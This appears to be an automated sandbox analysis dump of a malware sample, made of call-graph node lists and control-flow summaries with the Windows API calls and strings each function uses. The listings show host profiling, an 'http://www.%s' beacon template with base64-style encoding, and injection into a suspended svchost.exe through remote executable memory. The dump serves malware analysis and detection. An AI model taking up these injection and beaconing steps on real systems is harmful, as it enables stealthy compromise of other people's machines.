10726->10729 10727->10726 10728->10704 10730 5073bc _free 20 API calls 10728->10730 10729->10728 10730->10704 10732 509140 10731->10732 10733 5090e8 10731->10733 10732->10702 10734 5090f8 10733->10734 10735 5073bc _free 20 API calls 10733->10735 10736 50910a 10734->10736 10737 5073bc _free 20 API calls 10734->10737 10735->10734 10738 50911c 10736->10738 10739 5073bc _free 20 API calls 10736->10739 10737->10736 10740 50912e 10738->10740 10741 5073bc _free 20 API calls 10738->10741 10739->10738 10740->10732 10742 5073bc _free 20 API calls 10740->10742 10741->10740 10742->10732 10744 507a8e 10743->10744 10748 507aac 10743->10748 10744->10748 10749 509180 10744->10749 10747 5073bc _free 20 API calls 10747->10748 10748->10682 10750 509191 10749->10750 10784 507aa6 10749->10784 10785 509144 10750->10785 10753 509144 __fassign 20 API calls 10754 5091a4 10753->10754 10755 509144 __fassign 20 API calls 10754->10755 10756 5091af 10755->10756 10757 509144 __fassign 20 API calls 10756->10757 10758 5091ba 10757->10758 10759 509144 __fassign 20 API calls 10758->10759 10760 5091c8 10759->10760 10761 5073bc _free 20 API calls 10760->10761 10762 5091d3 10761->10762 10763 5073bc _free 20 API calls 10762->10763 10764 5091de 10763->10764 10765 5073bc _free 20 API calls 10764->10765 10766 5091e9 10765->10766 10767 509144 __fassign 20 API calls 10766->10767 10768 5091f7 10767->10768 10769 509144 __fassign 20 API calls 10768->10769 10770 509205 10769->10770 10771 509144 __fassign 20 API calls 10770->10771 10772 509216 10771->10772 10773 509144 __fassign 20 API calls 10772->10773 10774 509224 10773->10774 10775 509144 __fassign 20 API calls 10774->10775 10776 509232 10775->10776 10777 5073bc _free 20 API calls 10776->10777 10778 50923d 10777->10778 10779 5073bc _free 20 API calls 10778->10779 10780 509248 10779->10780 10781 5073bc _free 20 API calls 10780->10781 10782 509253 10781->10782 10783 5073bc _free 20 API calls 10782->10783 10783->10784 10784->10747 10786 50917b 10785->10786 10787 50916b 10785->10787 10786->10753 10787->10786 10788 5073bc _free 20 API calls 10787->10788 10788->10787 10789->10674 10827 508b06 10790->10827 10793 508bf3 10794 508bff _abort 10793->10794 10798 508c2c _abort 10794->10798 10800 508c26 _abort 10794->10800 10841 506a68 GetLastError 10794->10841 10796 508c78 10797 5062bc _free 20 API calls 10796->10797 10808 508c5b pre_c_initialization 10797->10808 10803 508ca4 10798->10803 10860 507c63 EnterCriticalSection 10798->10860 10800->10796 10800->10798 10800->10808 10805 508d03 10803->10805 10811 508cfb 10803->10811 10815 508d2e 10803->10815 10861 507cab LeaveCriticalSection 10803->10861 10805->10815 10862 508bea 10805->10862 10807 508a48 _abort 28 API calls 10807->10805 10869 50a5c9 10808->10869 10811->10807 10813 5069e4 pre_c_initialization 35 API calls 10816 508d91 10813->10816 10814 508bea _abort 35 API calls 10814->10815 10865 508db3 10815->10865 10816->10808 10817 5069e4 pre_c_initialization 35 API calls 10816->10817 10817->10808 10819 506481 _abort ___scrt_get_show_window_mode 10818->10819 10820 5064ad IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10819->10820 10821 50657e _abort 10820->10821 10822 50a183 _ValidateLocalCookies 5 API calls 10821->10822 10823 50659c 10822->10823 10823->10599 10873 508857 10824->10873 10830 508aac 10827->10830 10829 507321 10829->10596 10829->10793 10831 508ab8 ___scrt_is_nonwritable_in_current_image 10830->10831 10836 507c63 EnterCriticalSection 10831->10836 10833 508ac6 10837 508afa 10833->10837 10835 508aed ___scrt_is_nonwritable_in_current_image 10835->10829 10836->10833 10840 507cab LeaveCriticalSection 10837->10840 10839 508b04 10839->10835 10840->10839 10842 506a81 10841->10842 10843 506a87 10841->10843 10844 5075b9 pre_c_initialization 11 API calls 10842->10844 10845 50735f pre_c_initialization 17 API calls 10843->10845 10847 506ade SetLastError 10843->10847 10844->10843 10846 506a99 10845->10846 10849 50760f pre_c_initialization 11 API calls 10846->10849 10853 506aa1 10846->10853 10848 506ae7 10847->10848 10848->10800 10851 506ab6 10849->10851 10850 5073bc _free 17 API calls 10852 506aa7 10850->10852 10851->10853 10854 506abd 10851->10854 10855 506ad5 SetLastError 10852->10855 10853->10850 10856 506856 pre_c_initialization 17 API calls 10854->10856 10855->10848 10857 506ac8 10856->10857 10858 5073bc _free 17 API calls 10857->10858 10859 506ace 10858->10859 10859->10847 10859->10855 10860->10803 10861->10811 10863 5069e4 pre_c_initialization 35 API calls 10862->10863 10864 508bef 10863->10864 10864->10814 10866 508d82 10865->10866 10867 508db9 10865->10867 10866->10808 10866->10813 10866->10816 10872 507cab LeaveCriticalSection 10867->10872 10870 50a183 _ValidateLocalCookies 5 API calls 10869->10870 10871 50a5d4 10870->10871 10871->10871 10872->10866 10874 508863 _abort 10873->10874 10875 50887b 10874->10875 10895 50a486 GetModuleHandleW 10874->10895 10904 507c63 EnterCriticalSection 10875->10904 10881 508883 10883 5088f8 10881->10883 10893 508921 10881->10893 10905 509baf 10881->10905 10892 508910 10883->10892 10908 5097a5 10883->10908 10884 50896a 10887 50a5c9 _abort 5 API calls 10884->10887 10885 50893e 10915 508970 10885->10915 10891 50735e 10887->10891 10889 5097a5 _abort 5 API calls 10889->10893 10892->10889 10912 508961 10893->10912 10896 50886f 10895->10896 10896->10875 10897 5089b1 GetModuleHandleExW 10896->10897 10898 5089db GetProcAddress 10897->10898 10902 5089f0 10897->10902 10898->10902 10899 508a04 FreeLibrary 10900 508a0d 10899->10900 10901 50a183 _ValidateLocalCookies 5 API calls 10900->10901 10903 508a17 10901->10903 10902->10899 10902->10900 10903->10875 10904->10881 10923 5098e8 10905->10923 10909 5097d4 10908->10909 10910 50a183 _ValidateLocalCookies 5 API calls 10909->10910 10911 5097fd 10910->10911 10911->10892 10945 507cab LeaveCriticalSection 10912->10945 10914 50893a 10914->10884 10914->10885 10946 5077d4 10915->10946 10918 50899e 10921 5089b1 _abort 8 API calls 10918->10921 10919 50897e GetPEB 10919->10918 10920 50898e GetCurrentProcess TerminateProcess 10919->10920 10920->10918 10922 5089a6 ExitProcess 10921->10922 10926 509897 10923->10926 10925 50990c 10925->10883 10927 5098a3 ___scrt_is_nonwritable_in_current_image 10926->10927 10934 507c63 EnterCriticalSection 10927->10934 10929 5098b1 10935 509938 10929->10935 10933 5098cf ___scrt_is_nonwritable_in_current_image 10933->10925 10934->10929 10936 509958 10935->10936 10939 509960 10935->10939 10937 50a183 _ValidateLocalCookies 5 API calls 10936->10937 10938 5098be 10937->10938 10941 5098dc 10938->10941 10939->10936 10940 5073bc _free 20 API calls 10939->10940 10940->10936 10944 507cab LeaveCriticalSection 10941->10944 10943 5098e6 10943->10933 10944->10943 10945->10914 10947 5077f9 10946->10947 10951 5077ef 10946->10951 10948 5073f6 pre_c_initialization 5 API calls 10947->10948 10948->10951 10949 50a183 _ValidateLocalCookies 5 API calls 10950 507857 10949->10950 10950->10918 10950->10919 10951->10949 10952->10526 10956 507cab LeaveCriticalSection 10953->10956 10955 5082d5 10955->10526 10956->10955 10958 507d4a 10957->10958 10964 507d40 10957->10964 10959 5069e4 pre_c_initialization 35 API calls 10958->10959 10958->10964 10960 507d6b 10959->10960 10965 509725 10960->10965 10964->10534 10964->10535 10966 509738 10965->10966 10967 507d84 10965->10967 10966->10967 10973 507b5b 10966->10973 10969 509752 10967->10969 10970 509765 10969->10970 10971 50977a 10969->10971 10970->10971 10972 50823d __fassign 35 API calls 10970->10972 10971->10964 10972->10971 10974 507b67 ___scrt_is_nonwritable_in_current_image 10973->10974 10975 5069e4 pre_c_initialization 35 API calls 10974->10975 10976 507b70 10975->10976 10984 507bbe ___scrt_is_nonwritable_in_current_image 10976->10984 10985 507c63 EnterCriticalSection 10976->10985 10978 507b8e 10986 507bd2 10978->10986 10983 50731c _abort 35 API calls 10983->10984 10984->10967 10985->10978 10987 507be0 __fassign 10986->10987 10989 507ba2 10986->10989 10988 50790e __fassign 20 API calls 10987->10988 10987->10989 10988->10989 10990 507bc1 10989->10990 10993 507cab LeaveCriticalSection 10990->10993 10992 507bb5 10992->10983 10992->10984 10993->10992 10995 50806e 10994->10995 11000 507fc4 10994->11000 10997 50a183 _ValidateLocalCookies 5 API calls 10995->10997 10999 50811a 10997->10999 10999->10552 11004 5092c1 11000->11004 11003 50961b 41 API calls 11003->10995 11005 507d2d __fassign 35 API calls 11004->11005 11006 5092e1 MultiByteToWideChar 11005->11006 11008 50931f 11006->11008 11014 5093b7 11006->11014 11010 509273 __onexit 21 API calls 11008->11010 11015 509340 __alloca_probe_16 ___scrt_get_show_window_mode 11008->11015 11009 50a183 _ValidateLocalCookies 5 API calls 11011 508025 11009->11011 11010->11015 11018 50961b 11011->11018 11012 5093b1 11023 5093de 11012->11023 11014->11009 11015->11012 11016 509385 MultiByteToWideChar 11015->11016 11016->11012 11017 5093a1 GetStringTypeW 11016->11017 11017->11012 11019 507d2d __fassign 35 API calls 11018->11019 11020 50962e 11019->11020 11027 5093fe 11020->11027 11024 5093ea 11023->11024 11025 5093fb 11023->11025 11024->11025 11026 5073bc _free 20 API calls 11024->11026 11025->11014 11026->11025 11028 509419 11027->11028 11029 50943f MultiByteToWideChar 11028->11029 11030 5095f3 11029->11030 11031 509469 11029->11031 11032 50a183 _ValidateLocalCookies 5 API calls 11030->11032 11034 509273 __onexit 21 API calls 11031->11034 11037 50948a __alloca_probe_16 11031->11037 11033 508046 11032->11033 11033->11003 11034->11037 11035 5094d3 MultiByteToWideChar 11036 50953f 11035->11036 11038 5094ec 11035->11038 11039 5093de __freea 20 API calls 11036->11039 11037->11035 11037->11036 11054 5076ca 11038->11054 11039->11030 11042 509516 11042->11036 11044 5076ca 12 API calls 11042->11044 11043 50954e 11046 509273 __onexit 21 API calls 11043->11046 11047 50956f __alloca_probe_16 11043->11047 11044->11036 11045 5095e4 11049 5093de __freea 20 API calls 11045->11049 11046->11047 11047->11045 11048 5076ca 12 API calls 11047->11048 11050 5095c3 11048->11050 11049->11036 11050->11045 11051 5095d2 WideCharToMultiByte 11050->11051 11051->11045 11052 509612 11051->11052 11053 5093de __freea 20 API calls 11052->11053 11053->11036 11055 5073f6 pre_c_initialization 5 API calls 11054->11055 11056 5076f1 11055->11056 11057 507721 11056->11057 11058 5076fa LCMapStringEx 11056->11058 11065 507752 11057->11065 11062 507741 11058->11062 11063 50a183 _ValidateLocalCookies 5 API calls 11062->11063 11064 50774c 11063->11064 11064->11036 11064->11042 11064->11043 11066 5073f6 pre_c_initialization 5 API calls 11065->11066 11067 507779 11066->11067 11068 50a183 _ValidateLocalCookies 5 API calls 11067->11068 11069 50773a LCMapStringW 11068->11069 11069->11062 11071 507cce ___scrt_is_nonwritable_in_current_image 11070->11071 11078 507c63 EnterCriticalSection 11071->11078 11073 507cd8 11079 507db0 11073->11079 11077 507cf1 ___scrt_is_nonwritable_in_current_image 11077->10566 11078->11073 11091 5084d0 11079->11091 11081 507dfe 11082 5084d0 20 API calls 11081->11082 11083 507e1a 11082->11083 11084 5084d0 20 API calls 11083->11084 11085 507e38 11084->11085 11086 507ce5 11085->11086 11087 5073bc _free 20 API calls 11085->11087 11088 507cf9 11086->11088 11087->11086 11101 507cab LeaveCriticalSection 11088->11101 11090 507d03 11090->11077 11092 5084e1 11091->11092 11099 5084dd pre_c_initialization 11091->11099 11093 5084e8 11092->11093 11095 5084fb ___scrt_get_show_window_mode 11092->11095 11094 5062bc _free 20 API calls 11093->11094 11094->11099 11096 508532 11095->11096 11097 508529 11095->11097 11095->11099 11096->11099 11100 5062bc _free 20 API calls 11096->11100 11098 5062bc _free 20 API calls 11097->11098 11098->11099 11099->11081 11100->11099 11101->11090 12291 50be2f 12300 50c803 GetEnvironmentStringsW 12291->12300 12295 5073bc _free 20 API calls 12297 50be7c 12295->12297 12296 50be52 12298 5073bc _free 20 API calls 12296->12298 12299 50be47 12298->12299 12299->12295 12301 50be41 12300->12301 12302 50c817 12300->12302 12301->12299 12307 50be82 12301->12307 12303 509273 __onexit 21 API calls 12302->12303 12304 50c82b 12303->12304 12305 5073bc _free 20 API calls 12304->12305 12306 50c845 FreeEnvironmentStringsW 12305->12306 12306->12301 12310 50bea0 12307->12310 12308 50735f pre_c_initialization 20 API calls 12319 50beda 12308->12319 12309 50bf4b 12311 5073bc _free 20 API calls 12309->12311 12310->12308 12310->12310 12312 50bf65 12311->12312 12312->12296 12313 50735f pre_c_initialization 20 API calls 12313->12319 12314 50bf4d 12331 50bf7c 12314->12331 12318 5073bc _free 20 API calls 12318->12309 12319->12309 12319->12313 12319->12314 12320 50bf6f 12319->12320 12321 5073bc _free 20 API calls 12319->12321 12324 509c69 12319->12324 12337 50663f IsProcessorFeaturePresent 12320->12337 12321->12319 12323 50bf7b 12325 509c76 12324->12325 12326 509c84 12324->12326 12325->12326 12328 509c9d 12325->12328 12327 5062bc _free 20 API calls 12326->12327 12329 509c8e pre_c_initialization 12327->12329 12328->12329 12330 5062bc _free 20 API calls 12328->12330 12329->12319 12330->12329 12332 50bf53 12331->12332 12336 50bf89 12331->12336 12332->12318 12333 50bfa0 12334 5073bc _free 20 API calls 12333->12334 12334->12332 12335 5073bc _free 20 API calls 12335->12336 12336->12333 12336->12335 12338 50664a 12337->12338 12339 506465 _abort 8 API calls 12338->12339 12340 50665f GetCurrentProcess TerminateProcess 12339->12340 12340->12323

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 13f4ba0-13f4bbc CoInitialize 1 13f4bc2-13f4bff call 13f7b70 SetEvent 0->1 2 13f56f0-13f56fc CoUninitialize 0->2 1->2 6 13f4c05-13f4c0e 1->6 7 13f4c28-13f4c84 VirtualAlloc * 3 6->7 8 13f4c10-13f4c21 WaitForSingleObject 6->8 10 13f56eb 7->10 11 13f4c8a-13f4c8e 7->11 8->7 9 13f4c23 8->9 9->2 10->2 11->10 12 13f4c94-13f4c98 11->12 12->10 13 13f4c9e-13f4cbd 12->13 15 13f4cc3-13f4cd0 13->15 16 13f52a2-13f52b2 13->16 17 13f529d 15->17 18 13f4cd6-13f4ce3 15->18 19 13f5325-13f534e call 13f8370 16->19 20 13f52b4-13f52be 16->20 21 13f4d1c-13f4d29 18->21 22 13f4ce5-13f4d17 call 13f6170 * 2 call 13f60c0 18->22 35 13f56b8-13f56e5 VirtualFree * 3 19->35 36 13f5354-13f537f lstrlenA * 2 19->36 20->19 23 13f52c0-13f52d1 20->23 25 13f4d2b-13f4d5d call 13f6170 * 2 call 13f60c0 21->25 26 13f4d62-13f4d6f 21->26 22->17 23->19 28 13f52d3-13f52dd 23->28 25->17 33 13f4da8-13f4db5 26->33 34 13f4d71-13f4da3 call 13f6170 * 2 call 13f60c0 26->34 28->19 32 13f52df-13f5322 call 13f7b70 28->32 32->19 37 13f4e2c-13f4e39 33->37 38 13f4db7-13f4dd8 GetCurrentThreadId call 13f6170 33->38 34->17 35->10 36->35 43 13f5385-13f53ca wsprintfA CryptBinaryToStringA 36->43 44 13f4e3b-13f4e6d call 13f6170 * 2 call 13f60c0 37->44 45 13f4e72-13f4e7f 37->45 64 13f4dfd-13f4e04 38->64 65 13f4dda-13f4dfb call 13f6170 call 13f60c0 38->65 43->35 51 13f53d0-13f544e MultiByteToWideChar call 13f17d0 43->51 44->17 56 13f4ee1-13f4eee 45->56 57 13f4e81-13f4edc GetSystemMetrics * 2 call 13f6170 * 2 call 13f60c0 45->57 70 13f569b-13f56a2 51->70 71 13f5454-13f545e 51->71 61 13f4f40-13f4f4d 56->61 62 13f4ef0-13f4f13 GlobalMemoryStatus call 13f6170 56->62 57->17 76 13f4f4f-13f4f81 call 13f6170 * 2 call 13f60c0 61->76 77 13f4f86-13f4f93 61->77 88 13f4f18-13f4f3b call 13f6170 call 13f60c0 62->88 78 13f4e27 64->78 79 13f4e06-13f4e24 call 13f6170 call 13f60c0 64->79 65->78 70->35 83 13f56a4-13f56b2 VirtualFree 70->83 86 13f5470-13f5477 71->86 87 13f5460-13f546a 71->87 76->17 84 13f4f95-13f4fcb call 13f6170 * 2 call 13f60c0 77->84 85 13f4fd0-13f4fdd 77->85 78->17 79->78 83->35 84->17 100 13f4fdf-13f502d lstrlenA call 13f6170 * 2 call 13f60c0 85->100 101 13f5032-13f503f 85->101 95 13f551f-13f5526 86->95 96 13f547d-13f54af VirtualFree 86->96 87->86 87->95 88->17 95->70 115 13f552c-13f5540 EnterCriticalSection 95->115 108 13f54c0-13f54c7 96->108 100->17 105 13f5096-13f50a3 101->105 106 13f5041-13f5091 lstrlenA call 13f6170 * 2 call 13f60c0 101->106 124 13f50a5-13f50ff lstrlenA call 13f6170 * 2 call 13f60c0 105->124 125 13f5104-13f5111 105->125 106->17 108->95 123 13f54c9-13f54f5 call 13f17d0 108->123 117 13f558c-13f55c1 VirtualAlloc 115->117 118 13f5542-13f5573 VirtualAlloc call 13f7b70 115->118 132 13f568e-13f5695 LeaveCriticalSection 117->132 133 13f55c7-13f55d8 GetTickCount 117->133 142 13f5578-13f5587 118->142 150 13f54fa-13f550d 123->150 124->17 130 13f5113-13f516d lstrlenA call 13f6170 * 2 call 13f60c0 125->130 131 13f5172-13f517f 125->131 130->17 148 13f5181-13f51db lstrlenA call 13f6170 * 2 call 13f60c0 131->148 149 13f51e0-13f51ed 131->149 132->70 144 13f561c-13f5659 call 13f7b70 * 2 133->144 145 13f55da-13f561a call 13f7b70 * 2 133->145 142->132 193 13f565c-13f568b VirtualFree 144->193 145->193 148->17 153 13f523f-13f524c 149->153 154 13f51ef-13f523d lstrlenA call 13f6170 * 2 call 13f60c0 149->154 161 13f550f-13f5519 150->161 162 13f551b 150->162 153->17 170 13f524e-13f529a call 13f9b90 call 13f6170 * 2 call 13f60c0 153->170 154->17 161->162 173 13f551d 161->173 162->95 170->17 173->108 193->132
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 013F4BAC
                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 013F4BDB
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 013F4C19
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C49
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C60
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C77
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 013F56F0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                          • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 1834614700-967124566
                                                                                                                                                                                                                                                          • Opcode ID: 1df40ddd4ea846ddb5e48dd3b1df22e8392fe12914889d147457990c6efd154f
                                                                                                                                                                                                                                                          • Instruction ID: f6477a87094b9cc9f69eb61f1760b5ea8e231134b8258365a705b9516dcb1991
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df40ddd4ea846ddb5e48dd3b1df22e8392fe12914889d147457990c6efd154f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB62BDB5D00218EBDB11DB94DC85FEEB778BF49709F04819DE709A7281E7709A89CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 204 13f8f80-13f8f94 205 13f927b-13f9281 204->205 206 13f8f9a-13f8f9e 204->206 206->205 207 13f8fa4-13f8fa8 206->207 207->205 208 13f8fae-13f8fff call 13f7d20 * 3 GetVersionExA 207->208 215 13f9266-13f926a 208->215 216 13f9005-13f9016 GetSystemInfo 208->216 215->205 219 13f926c-13f9275 lstrcatA 215->219 217 13f901c-13f9023 216->217 218 13f9115-13f911c 216->218 222 13f9025-13f903d lstrcatA 217->222 223 13f9042-13f9049 217->223 220 13f9122-13f9129 218->220 221 13f9210-13f9217 call 13f9290 218->221 219->205 224 13f912b-13f9132 220->224 225 13f9174-13f917b 220->225 239 13f9219-13f9222 lstrcatA 221->239 240 13f9228-13f9237 lstrlenA 221->240 227 13f9110 222->227 228 13f904b-13f9063 lstrcatA 223->228 229 13f9068-13f906f 223->229 230 13f914e-13f9155 224->230 231 13f9134-13f914c lstrcatA 224->231 234 13f917d-13f9184 225->234 235 13f91c3-13f91ca 225->235 227->221 228->227 229->227 233 13f9075-13f907c 229->233 237 13f916f 230->237 238 13f9157-13f9169 lstrcatA 230->238 231->237 241 13f907e-13f9085 233->241 242 13f90a1-13f90ab GetSystemMetrics 233->242 243 13f9186-13f919e lstrcatA 234->243 244 13f91a0-13f91a7 234->244 235->221 236 13f91cc-13f91d3 235->236 247 13f91ef-13f91f6 236->247 248 13f91d5-13f91ed lstrcatA 236->248 237->221 238->237 239->240 249 13f9259-13f9263 lstrlenA 240->249 250 13f9239-13f9253 lstrcatA * 2 240->250 241->242 251 13f9087-13f909f lstrcatA 241->251 252 13f90ad-13f90c5 lstrcatA 242->252 253 13f90c7-13f90d1 GetSystemMetrics 242->253 246 13f91c1 243->246 245 13f91a9-13f91bb lstrcatA 244->245 244->246 245->246 246->221 247->221 256 13f91f8-13f920a lstrcatA 247->256 248->221 249->215 250->249 251->227 252->227 254 13f90ed-13f90f6 253->254 255 13f90d3-13f90eb lstrcatA 253->255 254->227 257 13f90f8-13f910a lstrcatA 254->257 255->227 256->221 257->227
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 013F8FF7
                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 013F9009
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 013F902E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 013F9054
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 013F913D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 013F9160
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 013F918F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 013F91B2
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 013F91DE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 013F9201
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 013F9222
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 013F922F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,013FC980), ref: 013F9242
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 013F9253
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F925D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 013F9275
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                          • Opcode ID: 842ab1ae996765ae0bd7d69ec332d1794b32234c38fa33b7d16df39ef69ac406
                                                                                                                                                                                                                                                          • Instruction ID: 22957e04157a4205ba7af5c88093b840ce589093a035390ba7ce01ed4483bcb2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 842ab1ae996765ae0bd7d69ec332d1794b32234c38fa33b7d16df39ef69ac406
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91814778A8020EEBDB219F64DC49FAE7B79FB06309F00954DFA05AA284C775D585CF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 013F20D4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 013F20E6
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,013FC38C), ref: 013F20FE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 013F210F
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 013F2187
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 013F21C0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F21D5
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,013F2080,?,00003000,00000040), ref: 013F21FE
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 013F2227
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 013F2245
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F2252
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F225F
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F2270
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                          • Opcode ID: 7f3e5482807095b177189ae42c8348199221e03fd1059a0b869ba23f9577f1f6
                                                                                                                                                                                                                                                          • Instruction ID: 698efb03cab1545cdb33a7cdb3572047e96de7a72680df0e9f5ff36ccc0a08d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3e5482807095b177189ae42c8348199221e03fd1059a0b869ba23f9577f1f6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54D128B5A4021AEBCB28CB54DC94FAAB7BDFB48304F04859CF709A7285D674DA81CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
